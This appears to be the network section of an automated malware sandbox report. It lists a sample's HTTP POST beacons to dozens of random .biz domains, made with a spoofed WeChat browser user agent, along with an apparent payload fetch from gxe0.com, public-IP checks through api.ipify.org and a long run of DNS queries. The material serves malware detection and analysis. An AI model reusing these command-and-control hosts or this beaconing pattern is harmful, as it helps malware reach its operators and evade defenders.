                    Source: global trafficHTTP traffic detected: POST /enot HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ojuwxx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /neqnfn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /jsjs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /sagfsex HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /cw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /metsntamhpqia HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /mwjtyvmb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /cpmmdtwjhfebkhhd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /hsywil HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /regvctlfaj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /kf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /swkrgjmrquig HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /fp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ifid HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /l HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fgevaiedsfhm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /fdlglrypxsfrxfy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /k HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /hvedkntqmbn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /bmomvdem HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /frjrhb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /pdk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /frknndojmsuq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /gdpjsspvdebtqhf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /vvmcwp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /hctkqhhcrnud HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: global trafficHTTP traffic detected: POST /ntc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: gxe0.com
                    Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                    Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                    Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                    Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                    Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                    Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                    Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                    Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                    Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                    Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                    Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                    Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                    Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                    Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                    Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                    Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                    Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
                    Source: global trafficDNS traffic detected: DNS query: deoci.biz
                    Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
                    Source: global trafficDNS traffic detected: DNS query: qaynky.biz
                    Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
                    Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
                    Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
                    Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
                    Source: global trafficDNS traffic detected: DNS query: myups.biz
                    Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
                    Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
                    Source: global trafficDNS traffic detected: DNS query: jpskm.biz
                    Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
                    Source: global trafficDNS traffic detected: DNS query: wllvnzb.biz
                    Source: global trafficDNS traffic detected: DNS query: gnqgo.biz
                    Source: global trafficDNS traffic detected: DNS query: jhvzpcfg.biz
                    Source: global trafficDNS traffic detected: DNS query: acwjcqqv.biz
                    Source: global trafficDNS traffic detected: DNS query: lejtdj.biz
                    Source: global trafficDNS traffic detected: DNS query: vyome.biz
                    Source: global trafficDNS traffic detected: DNS query: yauexmxk.biz
                    Source: global trafficDNS traffic detected: DNS query: iuzpxe.biz
                    Source: global trafficDNS traffic detected: DNS query: sxmiywsfv.biz
                    Source: global trafficDNS traffic detected: DNS query: vrrazpdh.biz
                    Source: global trafficDNS traffic detected: DNS query: ftxlah.biz
                    Source: global trafficDNS traffic detected: DNS query: typgfhb.biz
                    Source: global trafficDNS traffic detected: DNS query: esuzf.biz
                    Source: global trafficDNS traffic detected: DNS query: gvijgjwkh.biz
                    Source: global trafficDNS traffic detected: DNS query: qpnczch.biz
                    Source: global trafficDNS traffic detected: DNS query: brsua.biz
                    Source: global trafficDNS traffic detected: DNS query: dlynankz.biz
                    Source: global trafficDNS traffic detected: DNS query: oflybfv.biz
                    Source: global trafficDNS traffic detected: DNS query: yhqqc.biz
                    Source: global trafficDNS traffic detected: DNS query: mnjmhp.biz
                    Source: global trafficDNS traffic detected: DNS query: opowhhece.biz
                    Source: global trafficDNS traffic detected: DNS query: zjbpaao.biz
                    Source: global trafficDNS traffic detected: DNS query: jdhhbs.biz
                    Source: global trafficDNS traffic detected: DNS query: mgmsclkyu.biz
                    Source: global trafficDNS traffic detected: DNS query: warkcdu.biz
                    Source: global trafficDNS traffic detected: DNS query: gcedd.biz
                    Source: global trafficDNS traffic detected: DNS query: jwkoeoqns.biz
                    Source: global trafficDNS traffic detected: DNS query: xccjj.biz
                    Source: global trafficDNS traffic detected: DNS query: hehckyov.biz
                    Source: global trafficDNS traffic detected: DNS query: rynmcq.biz
                    Source: global trafficDNS traffic detected: DNS query: uaafd.biz
                    Source: global trafficDNS traffic detected: DNS query: eufxebus.biz
                    Source: global trafficDNS traffic detected: DNS query: pwlqfu.biz
                    Source: global trafficDNS traffic detected: DNS query: rrqafepng.biz
                    Source: global trafficDNS traffic detected: DNS query: ctdtgwag.biz
                    Source: global trafficDNS traffic detected: DNS query: tnevuluw.biz
                    Source: global trafficDNS traffic detected: DNS query: whjovd.biz
                    Source: global trafficDNS traffic detected: DNS query: gjogvvpsf.biz
                    Source: global trafficDNS traffic detected: DNS query: reczwga.biz
                    Source: global trafficDNS traffic detected: DNS query: bghjpy.biz
                    Source: global trafficDNS traffic detected: DNS query: damcprvgv.biz
                    Source: global trafficDNS traffic detected: DNS query: ocsvqjg.biz
                    Source: global trafficDNS traffic detected: DNS query: ywffr.biz
                    Source: global trafficDNS traffic detected: DNS query: ecxbwt.biz
                    Source: global trafficDNS traffic detected: DNS query: pectx.biz
                    Source: global trafficDNS traffic detected: DNS query: zyiexezl.biz
                    Source: global trafficDNS traffic detected: DNS query: banwyw.biz
                    Source: global trafficDNS traffic detected: DNS query: muapr.biz
                    Source: global trafficDNS traffic detected: DNS query: wxgzshna.biz
                    Source: global trafficDNS traffic detected: DNS query: zrlssa.biz
                    Source: global trafficDNS traffic detected: DNS query: jlqltsjvh.biz
                    Source: global trafficDNS traffic detected: DNS query: xyrgy.biz
                    Source: global trafficDNS traffic detected: DNS query: htwqzczce.biz
                    Source: global trafficDNS traffic detected: DNS query: kvbjaur.biz
                    Source: global trafficDNS traffic detected: DNS query: uphca.biz
                    Source: global trafficDNS traffic detected: DNS query: fjumtfnz.biz
                    Source: global trafficDNS traffic detected: DNS query: hlzfuyy.biz
                    Source: global trafficDNS traffic detected: DNS query: rffxu.biz
                    Source: global trafficDNS traffic detected: DNS query: cikivjto.biz
                    Source: global trafficDNS traffic detected: DNS query: qncdaagct.biz
                    Source: global trafficDNS traffic detected: DNS query: shpwbsrw.biz
                    Source: global trafficDNS traffic detected: DNS query: cjvgcl.biz
                    Source: global trafficDNS traffic detected: DNS query: neazudmrq.biz
                    Source: global trafficDNS traffic detected: DNS query: pgfsvwx.biz
                    Source: global trafficDNS traffic detected: DNS query: aatcwo.biz
                    Source: global trafficDNS traffic detected: DNS query: kcyvxytog.biz
                    Source: global trafficDNS traffic detected: DNS query: nwdnxrd.biz
                    Source: global trafficDNS traffic detected: DNS query: ereplfx.biz
                    Source: unknownHTTP traffic detected: POST /bkk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 844
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Nov 2024 08:57:43 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
